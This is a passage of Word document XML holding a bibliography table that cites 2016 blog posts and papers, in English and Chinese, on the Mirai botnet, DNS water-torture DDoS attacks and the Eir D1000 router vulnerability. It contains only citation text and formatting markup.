          <w:bookmarkEnd w:id="12"/>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:id w:val="111145805"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtEndPr/>
          <w:sdtContent>
            <w:p w:rsidR="005E419F" w:rsidRDefault="00A6519C" w:rsidP="009A1AB3">
              <w:pPr>
                <w:ind w:firstLine="422"/>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7889"/>
              </w:tblGrid>
              <w:tr w:rsidR="005E419F">
                <w:trPr>
                  <w:divId w:val="2057923878"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                        <w:kern w:val="0"/>
                        <w:sz w:val="24"/>
                        <w:szCs w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[1] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">R. Dobbins, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Mirai IoT Botnet Description and DDoS Attack Mitigation,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 26 10 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: https://www.arbornetworks.com/blog/asert/mirai-iot-botnet-description-ddos-attack-mitigation/.</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[2] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Y. T. K. R. e. a. Takeuchi Y, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Detection of the DNS Water Torture Attack by Analyzing Features of the Subdomain Name,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Journal of Information Processing, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 793-801, 5 24 2016. </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[3] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Secure64, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Water Torture: A Slow Drip DNS DDoS Attack,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 25 2 2014. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: https://blog.secure64.com/?p=377.</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[4] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>360</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>网络安全研究院</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“关于</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>dyn/twitter</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>受攻击情况的说明和</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>mirai</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>僵尸网络的回顾</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 23 10 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: http://blog.netlab.360.com/a-dyn-twitter-ddos-event-report-and-mirai-botnet-review/.</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[5] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>360</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>网络安全研究院</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“德国电信断网：</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>mirai</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>僵尸网络的新变种和旧主控</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 29 11 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: http://blog.netlab.360.com/a-mirai-botnet-evolvement-new-variant-and-old-c2/.</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[6] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Wikipedia, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Mirai (malware),</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 12 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: https://en.wikipedia.org/wiki/Mirai_(malware).</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[7] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>360</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>网络安全研究院</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Mirai Scanner,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: http://data.netlab.360.com/mirai-scanner.</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[8] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>360</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>网络安全研究院</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“关于</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> mirai </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>僵尸网络控制主机的数据分析</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 27 10 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: http://blog.netlab.360.com/a-mirai-botnet-c2-data-analysis/.</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[9] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>绿盟科技</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“德国</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>1127</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>断网事件技术分析与防护方案</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 25 12 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: http://blog.nsfocus.net/germany-1127-network-events/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="005E419F">
                <w:trPr>
                  <w:divId w:val="2057923878"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[10] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>360</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>网络安全研究院</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Mirai </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>变种中的</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>DGA,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 9 12 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: http://blog.netlab.360.com/new-mirai-variant-with-dga-chinese-version/.</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[11] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>李东宏</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Mirai</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>源码分析报告</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 13 10 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: http://blog.nsfocus.net/mirai-source-analysis-report/.</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[12] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">lennarthaagsma, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Recent vulnerability in Eir D1000 Router used to spread updated version of Mirai DDoS bot,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 28 11 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: https://blog.fox-it.com/2016/11/28/recent-vulnerability-in-eir-d1000-router-used-to-spread-updated-version-of-mirai-ddos-bot/.</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[13] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Kenzo, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>“</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Eir</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>’</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>s D1000 Modem Is Wide Open To Being Hacked,</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>”</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 7 11 2016. [</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>联机</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>]. Available: https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="005E419F">
                <w:trPr>
                  <w:divId w:val="2057923878"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w:rsidR="005E419F" w:rsidRDefault="005E419F">
                    <w:pPr>
                      <w:pStyle w:val="a9"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:hint="eastAsia"/>
